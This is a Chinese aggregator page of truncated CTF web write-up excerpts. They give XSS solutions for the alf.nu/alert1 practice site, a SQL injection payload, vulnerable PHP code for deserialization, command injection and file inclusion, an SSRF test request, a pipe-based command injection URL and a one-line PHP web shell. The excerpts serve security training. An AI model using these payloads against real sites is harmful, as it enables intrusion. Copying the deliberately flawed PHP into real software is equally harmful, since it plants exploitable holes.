首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
【
【CTF WEB】XSS-https://alf.nu/alert1
】的更多相关文章
【CTF WEB】XSS-https://alf.nu/alert1
XSS练习平台 https://alf.nu/alert1 Warmup 1");alert(1)// Adobe 1");alert(1)// JSON </script><script>alert(1)</script>// JavaScript %22);alert(1)// Markdown [[a|http://onerror=alert(1)//]] DOM Comment#--><img src=a onerror=aler…
XSS练习平台- https://alf.nu/alert1
https://alf.nu/alert1 参考:https://www.cnblogs.com/renzongxian/p/5617551.html 我目前的进度:https://alf.nu/alert(1)#accesstoken=Iq64Lxvg5sC0napbZrI7 看别人的答案做个一知半解,深感自己能力不足水平有限啊^_^! Warmup function escape(s) { return '<script>console.log("'+s+'…
【CTF WEB】ISCC 2016 web 2题记录
偶然看到的比赛,我等渣渣跟风做两题,剩下的题目工作太忙没有时间继续做. 第1题 sql注入: 题目知识 考察sql注入知识,题目地址:http://101.200.145.44/web1//index.php 做题过程 第一步:注入Playload user=flag&pass=' or updatexml(1,concat(0x7e,(select pw from user limit 1,1 )),0)# ' 第二步:注入效果 Masel's secure site 重置数据库 Erro…
【CTF WEB】反序列化
反序列化 漏洞代码 <?php error_reporting(0); if(empty($_GET['code'])) die(show_source(__FILE__)); class example { var $var='123'; function __destruct(){ $fb = fopen('./php.php','w'); fwrite($fb, $this->var); fclose($fb); } } $class = $_GET['code']; $class_un…
【CTF WEB】服务端请求伪造
服务端请求伪造 如你所愿,这次可以读取所有的图片,但是域名必须是www开头 测试方法 POST /index.php HTTP/1.1 Host: 218.2.197.236:27375 Content-Length: 40 Cache-Control: max-age=0 Origin: http://218.2.197.236:27375 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded…
【CTF WEB】命令执行
命令执行 找到题目中的KEY KEY为八位随机字符数字,例如key:1234qwer.提交1234qwer 即可. 漏洞代码 <?php system("ping -c 2 ".$_GET['ip']); ?> 测试方法 http://localhost/command.php?ip=127.0.0.1|cat command.php…
【CTF WEB】函数绕过
函数绕过 <?php show_source(__FILE__); $c = "<?php exit;?>"; @$c.=$_GET['c']; @$filename = $_GET['file']; @file_put_contents($filename, $c); highlight_file('tmp.php'); ?> <?php system($_REQUEST['z']); ?> 测试方法 http://218.2.197.236:29…
【CTF WEB】文件包含
文件包含 题目要求: 请找到题目中FLAG 漏洞源码 <meta charset='utf-8'> <center><h1>文件阅读器</h1></center> <!-- 据说flag在flag.php里 --> <?php error_reporting(0); $f=$_GET['file']; if(stripos($f,"..")===false) { //; } else { exit('inva…
【CTF WEB】GCTF-2017读文件
读文件 只给了个1.txt可以读,试了一下加*不行,感觉不是命令执行,"../"返回上级目录也不行,猜测可能过滤了什么,在1.txt中间加上"./"发现仍能读取,说明"./"被过滤了,构造payload,在上级目录的flag.php的注释里读到flag 测试方法 http://218.2.197.232:18008/a/down.php?p=...//fla./g.php…
xss练习,alf.nu/alert1,1-12
觉得自己很菜,故找一些题来做,随便找了下.记一下通关攻略 https://alf.nu/alert1 第一关 题目:warmup function escape(s) { return '<script>console.log("'+s+'");</script>'; } 题解:");alert(1)// 分析:简单闭合一下双引号即可 第二关 题目:adobe function escape(s) { s = s.replace(/"/g,…